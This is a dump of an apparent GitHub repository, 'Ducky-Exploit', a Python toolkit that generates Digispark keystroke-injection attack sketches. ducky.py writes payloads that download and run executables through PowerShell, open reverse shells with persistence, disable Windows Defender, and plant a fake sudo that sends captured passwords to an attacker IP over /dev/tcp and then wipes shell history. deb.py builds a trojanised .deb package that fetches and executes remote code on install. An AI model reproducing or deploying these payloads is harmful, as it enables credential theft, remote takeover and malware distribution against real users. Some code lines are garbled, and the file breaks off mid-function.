├── screenshot ├── Capture.JPG ├── screenshot.jpg ├── screenshot2.jpg └── screenshot3.jpg ├── README.md ├── LICENSE ├── deb.py └── ducky.py /screenshot/Capture.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/Capture.JPG -------------------------------------------------------------------------------- /screenshot/screenshot.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot.jpg -------------------------------------------------------------------------------- /screenshot/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot2.jpg -------------------------------------------------------------------------------- /screenshot/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itsmehacker/Ducky-Exploit/HEAD/screenshot/screenshot3.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Exploit 2 | # Introduction 3 | Ducky Exploit is a Python framework which helps us to code a Digispark as a Rubber Ducky 4 | 5 | 6 | This script has been tested on 7 | * **Kali Linux 18.2** 8 | * **Ubuntu 18.04** 9 | * **Windows** 10 | 11 | **Works with both Python2 and Python3** 12 | 13 | ## Keyboard Support Type 14 | US Type Keyboard 15 | 16 | 17 | ## Usage 18 | ```bash 19 | git clone https://github.com/itsmehacker5/Ducky-Exploit.git 20 | cd Ducky-Exploit/ 21 | python ducky.py 22 | ``` 23 | ## Screenshots 24 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/Capture.JPG) 25 | 
![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot.jpg) 26 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot2.jpg) 27 | ![example](https://github.com/itsmehacker/Ducky-Exploit/blob/master/screenshot/screenshot3.jpg) 28 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Hacker Destination 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /deb.py: -------------------------------------------------------------------------------- 1 | import os,time 2 | import argparse,sys 3 | 4 | try: 5 | raw_input # Python 2 6 | except NameError: 7 | raw_input = input # Python 3 8 | 9 | #Colors 10 | R = '\033[31m' # red 11 | G = '\033[32m' # green 12 | C = '\033[36m' # cyan 13 | W = '\033[0m' #white 14 | 15 | def main(): 16 | global name 17 | global vers 18 | global arch 19 | global lhost 20 | name = raw_input(R + '[+]' + G + 'Enter of the name of the Deb file -> ' + W) 21 | vers = raw_input(R + '[+]' + G + 'Enter of the Version of the Deb file -> ' + W) 22 | lhost = raw_input(R + '[+]' + G + 'Enter of the Lhost -> ' + W) 23 | arch = raw_input(R + '[+]' + G + 'Enter of the Architecture of the Deb file (i386/amd64) -> ' + W) 24 | global h 25 | global j 26 | global we 27 | global uu 28 | h = str(name) 29 | j = str(name)+"_"+str(vers) 30 | we = str(lhost) 31 | uu = str(arch) 32 | with open(h, "w+") as r: 33 | payload = """ 34 | #!/bin/bash 35 | python -c "import urllib2; r = urllib2.urlopen('http://"""+str(lhost)+""":8080/SecPatch'); exec(r.read());" 36 | """ 37 | k = r.write(payload) 38 | o = open("postinst" , "a") 39 | m = """ 40 | #!/bin/bash 41 | chmod 2755 /usr/local/bin/"""+h+""" && /usr/local/bin/"""+h+""" & 42 | """ 43 | o.write(m) 44 | o.close() 45 | os.system("chmod 0755 postinst") 46 | print ("") 47 | print ("kimi finally done with it ;) happy injecting !!") 48 | print ("") 49 | 50 | #else: 51 | # print banner 52 | 53 | def make_deb(): 54 | gen = """ 55 | #!/bin/sh 56 | chmod u+x """+h+""" 57 | cat >> control << EOF 58 | Package: """+str(name)+""" 59 | Version: """+str(vers)+""" 60 | Section: Games and Amusement 61 | Priority: optional 62 | Architecture: """+uu+""" 63 | Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) 64 | Description: MDPC kimi (SSA-RedTeam development 2017) 65 | EOF 66 | mkdir -p 
"""+j+"""/usr/local/bin 67 | cp """+h+""" """+j+"""/usr/local/bin 68 | sleep 2 69 | mkdir -p """+j+"""/DEBIAN 70 | cp control """+j+"""/DEBIAN/control 71 | cp postinst """+j+"""/DEBIAN/postinst 72 | sleep 3 73 | dpkg-deb --build """+j+""" 74 | sleep 5 75 | rm -rf """+h+""" 76 | rm -rf control 77 | rm -rf postinst 78 | rm -rf """+j+""" 79 | rm -rf fro.sh 80 | """ 81 | er = open("fro.sh" , "w") 82 | er.write(gen) 83 | er.close() 84 | 85 | os.system("chmod +x fro.sh") 86 | os.system("./fro.sh") 87 | os.system("sudo chmod 777 *.deb") 88 | 89 | 90 | if __name__ == '__main__': 91 | main() 92 | make_deb() 93 | -------------------------------------------------------------------------------- /ducky.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Importing Libary 4 | import os 5 | import platform 6 | import time 7 | import subprocess as subp 8 | import sys 9 | #Colors 10 | R = '\033[31m' # red 11 | G = '\033[32m' # green 12 | C = '\033[36m' # cyan 13 | W = '\033[0m' #white 14 | 15 | try: 16 | raw_input # Python 2 17 | except NameError: 18 | raw_input = input # Python 3 19 | 20 | if sys.platform == 'win32': 21 | os.system('cls') # Windows 22 | else: 23 | os.system('clear') # UNIX 24 | 25 | try: 26 | unicode # Python 2 27 | except NameError: 28 | unicode = str # Python 3 29 | 30 | #defining Banner 31 | def banner(): 32 | banner = """ 33 | ____ __ ______ __ _ __ 34 | / __ \__ _______/ /____ __ / ____/ ______ / /___ (_) /_ 35 | / / / / / / / ___/ //_/ / / / / __/ | |/_/ __ \/ / __ \/ / __/ 36 | / /_/ / /_/ / /__/ ,< / /_/ / / /____> ") 110 | f = open( "path" + name +".ino","w+") 111 | print 112 | print (R + 'Example -> Http://192.168.0.1/Payload.exe' + W) 113 | url = raw_input("[!] 
Enter URL with Payload Name -> ") 114 | x = 'DigiKeyboard.print("$client.DownloadFile(' + url 115 | time.sleep(2) 116 | f.write('#include "DigiKeyboard.h" \n') 117 | print 118 | f.write("void setup() { \n") 119 | f.write("} \n") 120 | print 121 | f.write("void loop() {\n") 122 | f.write("int d=1000;\n") 123 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 124 | f.write("DigiKeyboard.delay(0);\n") 125 | f.write("DigiKeyboard.sendKeyStroke(0,MOD_GUI_LEFT);\n") 126 | f.write('DigiKeyboard.print("Windows Powershell");\n') 127 | f.write("DigiKeyboard.delay(2000);\n") 128 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 129 | f.write("DigiKeyboard.delay(1000);\n") 130 | f.write('DigiKeyboard.print("start powershell -verb runas;exit");\n') 131 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 132 | f.write("DigiKeyboard.delay(500);\n") 133 | f.write("DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);\n") 134 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 135 | f.write("DigiKeyboard.delay(400);\n") 136 | f.write('DigiKeyboard.print("$client = new-object System.Net.WebClient");\n') 137 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 138 | f.write("DigiKeyboard.delay(500);\n") 139 | f.write(x+''','Sys32Data.exe')");\n''') 140 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 141 | f.write('DigiKeyboard.print("start Sys32Data.exe");\n') 142 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 143 | f.write("DigiKeyboard.delay(1000);\n") 144 | f.write('DigiKeyboard.print("exit");\n') 145 | f.write("DigiKeyboard.delay(50);\n") 146 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 147 | f.write("DigiKeyboard.delay(50);\n") 148 | print 149 | f.close() 150 | time.sleep(2) 151 | print ("File has been Created Named ->"+name+"") 152 | 153 | elif choice == '2': 154 | os.system("cls") 155 | shell = """ 156 | Reverse Shell With Persistence 157 | """ 158 | name = raw_input("[!] Enter The File Name -> ") 159 | IP = raw_input("[!] 
Enter The Your IP -> ") 160 | PORT = raw_input("[!] Enter The Your Port -> ") 161 | f = open("path"+name+".ino","w+") 162 | f.write('#include "DigiKeyboard.h" \n') 163 | print 164 | f.write("void setup() { \n") 165 | f.write("} \n") 166 | print 167 | f.write("void loop() {\n") 168 | f.write("int d=1000;\n") 169 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 170 | f.write("DigiKeyboard.delay(0);\n") 171 | f.write('DigiKeyboard.print("Windows Powershell");\n') 172 | f.write("DigiKeyboard.delay(2000);\n") 173 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 174 | f.write("DigiKeyboard.delay(1000);\n") 175 | f.write('DigiKeyboard.print("$client = new-object System.Net.WebClient");\n') 176 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 177 | f.write("DigiKeyboard.delay(500);\n") 178 | f.write('''DigiKeyboard.print("$client.DownloadFile('https://tinyurl.com/y88r9epk','Sys32Data.exe')");\n''') 179 | f.write('DigiKeyboard.print("cd / & mkdir System & cd System");\n') 180 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 181 | f.write("DigiKeyboard.delay(500);\n") 182 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 183 | f.write("DigiKeyboard.delay(500);\n") 184 | f.write("echo START /MIN Sys32Data.exe "+IP+" "+PORT+" -e cmd.exe -d ^& exit > start.bat") 185 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 186 | f.write('DigiKeyboard.print("start Sys32Data.exe");\n') 187 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 188 | f.write("DigiKeyboard.delay(1000);\n") 189 | f.write('DigiKeyboard.print("exit");\n') 190 | f.write("DigiKeyboard.delay(50);\n") 191 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 192 | f.write("DigiKeyboard.delay(50);\n") 193 | print 194 | f.close() 195 | 196 | elif choice == '3': 197 | os.system("cls") 198 | defenser = """ 199 | Disable Windows Defender 200 | """ 201 | print() 202 | name = raw_input("[!] Enter The File Name -> ") 203 | IP = raw_input("[!] Enter The Your IP -> ") 204 | PORT = raw_input("[!] 
Enter The Your Port -> ") 205 | f = open("path"+name+".ino","w+") 206 | f.write('#include "DigiKeyboard.h" \n') 207 | f.write("void setup() { \n") 208 | f.write("} \n") 209 | f.write("void loop() {\n") 210 | f.write("int d=1000;\n") 211 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 212 | f.write("DigiKeyboard.delay(0);\n") 213 | f.write('DigiKeyboard.print("Windows Powershell");\n') 214 | f.write("DigiKeyboard.delay(2000);\n") 215 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 216 | f.write("DigiKeyboard.delay(1000);\n") 217 | f.write('DigiKeyboard.print("powershell Start-Process powershell -Verb runAs");\n') 218 | f.write("DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);\n") 219 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 220 | f.write("DigiKeyboard.delay(1000);\n") 221 | f.write("Set-MpPreference -DisableRealtimeMonitoring $true") 222 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 223 | f.write("exit") 224 | f.close() 225 | elif choice == '4': 226 | print('exit selected') 227 | exit() 228 | else: 229 | print("Wrong option selection. 
Enter any key to try again..") 230 | os.system('cls') 231 | print_menu() 232 | 233 | #function Linux 234 | def Linux(): 235 | os.system("cls") 236 | linux = """ 237 | /$$ /$$ 238 | | $$ |__/ 239 | | $$ /$$ /$$$$$$$ /$$ /$$ /$$ /$$ 240 | | $$ | $$ | $$__ $$ | $$ | $$ | $$ /$$/ 241 | | $$ | $$ | $$ \ $$ | $$ | $$ \ $$$$/ 242 | | $$ | $$ | $$ | $$ | $$ | $$ >$$ $$ 243 | | $$$$$$$$ | $$ | $$ | $$ | $$$$$$/ /$$/\ $$ 244 | |________/ |__/ |__/ |__/ \______/ |__/ \__/ 245 | """ 246 | print (C + linux + W) 247 | time.sleep(1) 248 | print (R + '[+]' + G + ' Choose the Attack' + W ) 249 | print (R + '[1]' + G + ' Sudo Password Grabber ' + W) 250 | print (R + '[2]' + G + ' Reverse Shell' + W) 251 | print (R + '[3]' + G + ' DEB Package With Persistence' + W) 252 | print (R + '[4]' + G + ' Exit' + W) 253 | choice = input("Enter your choice [1-4]: ") 254 | 255 | if choice == '1': 256 | os.system("cls") 257 | sudo = """ 258 | Sudo Password Grabber 259 | """ 260 | print (C + sudo + W) 261 | print ("") 262 | name = raw_input("[!] Enter The File Name -> ") 263 | IP = raw_input("[!] Enter The Your IP -> ") 264 | PORT = raw_input("[!] 
Enter The Your Port -> ") 265 | f = open("path"+name+".ino","w+") 266 | f.write('#include "DigiKeyboard.h" \n') 267 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER); \n") 268 | f.write("void setup() { \n") 269 | f.write("} \n") 270 | f.write("void loop() { \n ") 271 | f.write("DigiKeyboard.sendKeyStroke(0); \n") 272 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE); \n") 273 | f.write("DigiKeyboard.delay(500);\n") 274 | f.write('DigiKeyboard.print("Terminal"); \n') 275 | f.write("DigiKeyboard.delay(50);\n") 276 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 277 | f.write("DigiKeyboard.delay(100);\n") 278 | f.write('DigiKeyboard.print("mkdir -p ~/.config/sudo");\n') 279 | f.write("DigiKeyboard.delay(50); \n") 280 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 281 | f.write("DigiKeyboard.delay(100);\n") 282 | f.write('DigiKeyboard.print("rm ~/.config/sudo/sudo");\n') 283 | f.write("DigiKeyboard.delay(50);\n") 284 | f.write("DigiKeyboard.delay(100);\n") 285 | f.write('DigiKeyboard.print("echo "#!/bin/bash");\n') 286 | f.write("DigiKeyboard.delay(50);\n") 287 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 288 | f.write("DigiKeyboard.delay(100);\n") 289 | f.write('DigiKeyboard.print("/usr/bin/sudo -n true 2> dev/null");\n') 290 | f.write("DigiKeyboard.delay(50);\n") 291 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 292 | f.write("DigiKeyboard.delay(100);\n") 293 | f.write('DigiKeyboard.print("if [ $? 
-eq 0 ]");\n') 294 | f.write("DigiKeyboard.delay(50);\n") 295 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 296 | f.write("DigiKeyboard.delay(100);\n") 297 | f.write('DigiKeyboard.print("then");\n') 298 | f.write("DigiKeyboard.delay(50);\n") 299 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 300 | f.write("DigiKeyboard.delay(100);\n") 301 | f.write('DigiKeyboard.print("/usr/bin/sudo $@");\n') 302 | f.write("DigiKeyboard.delay(50);\n") 303 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 304 | f.write("DigiKeyboard.delay(100);\n") 305 | f.write('DigiKeyboard.print("else");\n') 306 | f.write("DigiKeyboard.delay(50);\n") 307 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 308 | f.write("DigiKeyboard.delay(100);\n") 309 | f.write('DigiKeyboard.print("echo -n "[sudo] password for $USER:")";\n') 310 | f.write("DigiKeyboard.delay(50);\n") 311 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 312 | f.write("DigiKeyboard.delay(100);\n") 313 | f.write('DigiKeyboard.print("read -s pwd");\n') 314 | f.write("DigiKeyboard.delay(50);\n") 315 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 316 | f.write("DigiKeyboard.delay(100);\n") 317 | f.write('DigiKeyboard.print("echo");\n') 318 | f.write("DigiKeyboard.delay(50);\n") 319 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 320 | f.write("DigiKeyboard.delay(100);\n") 321 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/share -S true 2>/dev/null");\n') 322 | f.write("DigiKeyboard.delay(50);\n") 323 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 324 | f.write("DigiKeyboard.delay(100);\n") 325 | f.write('DigiKeyboard.print("if [ $? 
-eq 1 ]");\n') 326 | f.write("DigiKeyboard.delay(50);\n") 327 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 328 | f.write("DigiKeyboard.delay(100);\n") 329 | f.write('DigiKeyboard.print("then");\n') 330 | f.write("DigiKeyboard.delay(50);\n") 331 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 332 | f.write("DigiKeyboard.delay(100);\n") 333 | f.write('DigiKeyboard.print("echo "$USER:$pwd:invalid" > /dev/tcp/' + IP + '/' + PORT + '");\n') 334 | f.write("DigiKeyboard.delay(50);\n") 335 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 336 | f.write("DigiKeyboard.delay(100);\n") 337 | f.write('DigiKeyboard.print("echo Sorry, try again.");\n') 338 | f.write("DigiKeyboard.delay(50);\n") 339 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 340 | f.write("DigiKeyboard.delay(100);\n") 341 | f.write('DigiKeyboard.print("sudo $@");\n') 342 | f.write("DigiKeyboard.delay(50);\n") 343 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 344 | f.write("DigiKeyboard.delay(100);\n") 345 | f.write('DigiKeyboard.print("else");\n') 346 | f.write("DigiKeyboard.delay(50);\n") 347 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 348 | f.write("DigiKeyboard.delay(100);\n") 349 | f.write('DigiKeyboard.print("echo "$USER:$pwd:valid" > /dev/tcp/' + IP + '/1337 ");\n') 350 | f.write("DigiKeyboard.delay(50);\n") 351 | f.write("DigiKeyboard.sendKeyStro)ke(KEY_ENTER);\n") 352 | f.write("DigiKeyboard.delay(100);\n") 353 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/sudo -S $@ ");\n') 354 | f.write("DigiKeyboard.delay(50);\n") 355 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 356 | f.write("DigiKeyboard.delay(100);\n") 357 | f.write('DigiKeyboard.print("fi");\n') 358 | f.write("DigiKeyboard.delay(50);\n") 359 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 360 | f.write("DigiKeyboard.delay(100);\n") 361 | f.write('DigiKeyboard.print("fi > ~/.config/sudo/sudo");\n') 362 | f.write("DigiKeyboard.delay(50);\n") 363 | 
f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 364 | f.write("DigiKeyboard.delay(100);\n") 365 | f.write('DigiKeyboard.print("chmod u+x ~/.config/sudo/sudo");\n') 366 | f.write("DigiKeyboard.delay(50);\n") 367 | f.write("DigiKeyboard.sendKeyStrso)ke(KEY_ENTER);\n") 368 | f.write("DigiKeyboard.delay(100);\n") 369 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile");\n') 370 | f.write("DigiKeyboard.delay(50);\n") 371 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 372 | f.write("DigiKeyboard.delay(100);\n") 373 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc");\n') 374 | f.write("DigiKeyboard.delay(50);\n") 375 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 376 | f.write("DigiKeyboard.delay(100);\n") 377 | f.write('DigiKeyboard.print("history -c && rm .bash_history && exit");\n') 378 | f.write("DigiKeyboard.delay(50);)\n") 379 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 380 | f.write("DigiKeyboard.delay(100);\n") 381 | f.write('DigiKeyboard.print("MOD_GUI_LEFT, KEY_Q");\n ') 382 | f.write("DigiKeyboard.delay(50);\n") 383 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 384 | f.write("} \n") 385 | f.close() 386 | time.sleep(1) 387 | print ('File Created -> '+name+'') 388 | print_menu() 389 | 390 | elif choice == '2': 391 | os.system("cls") 392 | sudo = """ 393 | Reverse Shell 394 | """ 395 | print ("") 396 | name = raw_input("[!] Enter The File Name -> ") 397 | url = raw_input("[!] 
Enter URL -> ") 398 | pname = raw_input("Payload Name -> ") 399 | f = open("path"+name+".ino","w+") 400 | f.write('#include "DigiKeyboard.h" \n') 401 | f.write("void setup() { \n") 402 | f.write("} \n") 403 | f.write("void loop() {\n") 404 | f.write("DigiKeyboard.delay(200);\n") 405 | f.write("DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);\n") 406 | f.write("DigiKeyboard.delay(2000);\n") 407 | f.write('DigiKeyboard.print("wget http://'+url+'/'+pname+'.py");\n') 408 | f.write("DigiKeyboard.delay(500);\n") 409 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 410 | f.write('DigiKeyboard.print("python '+ panme +'.py");\n') 411 | f.write("DigiKeyboard.delay(500);\n") 412 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 413 | f.write("DigiKeyboard.delay(500);\n") 414 | f.write('DigiKeyboard.print("exit");\n') 415 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 416 | f.write("}\n") 417 | f.close() 418 | time.sleep(1) 419 | print ('File Created -> '+name+'') 420 | print_menu() 421 | elif choice == '3': 422 | os.system("cls") 423 | DEB = """ 424 | DEB Package with Persistence 425 | """ 426 | print (C + DEB + W) 427 | print 428 | os.system("python deb.py") 429 | print ('\n' + G + '[!]' + C + ' Starting Apache Server...' 
+ W) 430 | subp.check_output(['service', 'apache2', 'start']) 431 | name = raw_input("[+] Enter Name of the Package -> ") 432 | os.system("mv "+name+" /var/www/html/"+ name +"") 433 | print ('\n' + G + '[!]' + C + ' Moving File to apache2 folder' + W) 434 | elif choice == '4': 435 | exit() 436 | 437 | #function Mac OS 438 | def Mac(): 439 | os.system("cls") 440 | mac = """ 441 | /$$ /$$ /$$$$$$ /$$$$$$ 442 | | $$$ /$$$ /$$__ $$ /$$__ $$ 443 | | $$$$ /$$$$ /$$$$$$ /$$$$$$$ | $$ \ $$ | $$ \__/ /$$ /$$ 444 | | $$ $$/$$ $$ |____ $$ /$$_____/ | $$ | $$ | $$$$$$ | $$ /$$/ 445 | | $$ $$$| $$ /$$$$$$$ | $$ | $$ | $$ \____ $$ \ $$$$/ 446 | | $$\ $ | $$ /$$__ $$ | $$ | $$ | $$ /$$ \ $$ >$$ $$ 447 | | $$ \/ | $$ | $$$$$$$ | $$$$$$$ | $$$$$$/ | $$$$$$/ /$$/\ $$ 448 | |__/ |__/ \_______/ \_______/ \______/ \______/ |__/ \__/ 449 | """ 450 | print (C + mac + W) 451 | time.sleep(2) 452 | print 453 | print 454 | print (R + '[+]' + G + ' Choose the Attack' + W) 455 | print (R + '[1]' + G + ' Sudo Password Grabber' + W ) 456 | print (R + '[2]' + G + ' Reverse Shell' + W) 457 | print (R + '[3]' + G + ' Exit' + W) 458 | choice = input("Enter your choice [1-4]: ") 459 | 460 | if choice == '1': 461 | os.system("cls") 462 | sudo = """ 463 | Sudo Password Grabber 464 | """ 465 | print (C + sudo + W) 466 | print ("") 467 | name = raw_input("[!] Enter The File Name -> ") 468 | IP = raw_input("[!] Enter The Your IP -> ") 469 | PORT = raw_input("[!] 
Enter The Your Port -> ") 470 | f = open("path"+name+".ino","w+") 471 | f.write('#include "DigiKeyboard.h" \n') 472 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER); \n") 473 | f.write("void setup() { \n") 474 | f.write("} \n") 475 | f.write("void loop() { \n ") 476 | f.write("DigiKeyboard.sendKeyStroke(0); \n") 477 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE); \n") 478 | f.write("DigiKeyboard.delay(500);\n") 479 | f.write('DigiKeyboard.print("Terminal"); \n') 480 | f.write("DigiKeyboard.delay(50);\n") 481 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 482 | f.write("DigiKeyboard.delay(100);\n") 483 | f.write('DigiKeyboard.print("mkdir -p ~/.config/sudo");\n') 484 | f.write("DigiKeyboard.delay(50); \n") 485 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 486 | f.write("DigiKeyboard.delay(100);\n") 487 | f.write('DigiKeyboard.print("rm ~/.config/sudo/sudo");\n') 488 | f.write("DigiKeyboard.delay(50);\n") 489 | f.write("DigiKeyboard.delay(100);\n") 490 | f.write('DigiKeyboard.print("echo "#!/bin/bash");\n') 491 | f.write("DigiKeyboard.delay(50);\n") 492 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 493 | f.write("DigiKeyboard.delay(100);\n") 494 | f.write('DigiKeyboard.print("/usr/bin/sudo -n true 2> dev/null");\n') 495 | f.write("DigiKeyboard.delay(50);\n") 496 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 497 | f.write("DigiKeyboard.delay(100);\n") 498 | f.write('DigiKeyboard.print("if [ $? 
-eq 0 ]");\n') 499 | f.write("DigiKeyboard.delay(50);\n") 500 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 501 | f.write("DigiKeyboard.delay(100);\n") 502 | f.write('DigiKeyboard.print("then");\n') 503 | f.write("DigiKeyboard.delay(50);\n") 504 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 505 | f.write("DigiKeyboard.delay(100);\n") 506 | f.write('DigiKeyboard.print("/usr/bin/sudo $@");\n') 507 | f.write("DigiKeyboard.delay(50);\n") 508 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 509 | f.write("DigiKeyboard.delay(100);\n") 510 | f.write('DigiKeyboard.print("else");\n') 511 | f.write("DigiKeyboard.delay(50);\n") 512 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 513 | f.write("DigiKeyboard.delay(100);\n") 514 | f.write('DigiKeyboard.print("echo -n "[sudo] password for $USER:")";\n') 515 | f.write("DigiKeyboard.delay(50);\n") 516 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 517 | f.write("DigiKeyboard.delay(100);\n") 518 | f.write('DigiKeyboard.print("read -s pwd");\n') 519 | f.write("DigiKeyboard.delay(50);\n") 520 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 521 | f.write("DigiKeyboard.delay(100);\n") 522 | f.write('DigiKeyboard.print("echo");\n') 523 | f.write("DigiKeyboard.delay(50);\n") 524 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 525 | f.write("DigiKeyboard.delay(100);\n") 526 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/share -S true 2>/dev/null");\n') 527 | f.write("DigiKeyboard.delay(50);\n") 528 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 529 | f.write("DigiKeyboard.delay(100);\n") 530 | f.write('DigiKeyboard.print("if [ $? 
-eq 1 ]");\n') 531 | f.write("DigiKeyboard.delay(50);\n") 532 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 533 | f.write("DigiKeyboard.delay(100);\n") 534 | f.write('DigiKeyboard.print("then");\n') 535 | f.write("DigiKeyboard.delay(50);\n") 536 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 537 | f.write("DigiKeyboard.delay(100);\n") 538 | f.write('DigiKeyboard.print("echo "$USER:$pwd:invalid" > /dev/tcp/' + IP + '/' + PORT + '");\n') 539 | f.write("DigiKeyboard.delay(50);\n") 540 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 541 | f.write("DigiKeyboard.delay(100);\n") 542 | f.write('DigiKeyboard.print("echo Sorry, try again.");\n') 543 | f.write("DigiKeyboard.delay(50);\n") 544 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 545 | f.write("DigiKeyboard.delay(100);\n") 546 | f.write('DigiKeyboard.print("sudo $@");\n') 547 | f.write("DigiKeyboard.delay(50);\n") 548 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 549 | f.write("DigiKeyboard.delay(100);\n") 550 | f.write('DigiKeyboard.print("else");\n') 551 | f.write("DigiKeyboard.delay(50);\n") 552 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 553 | 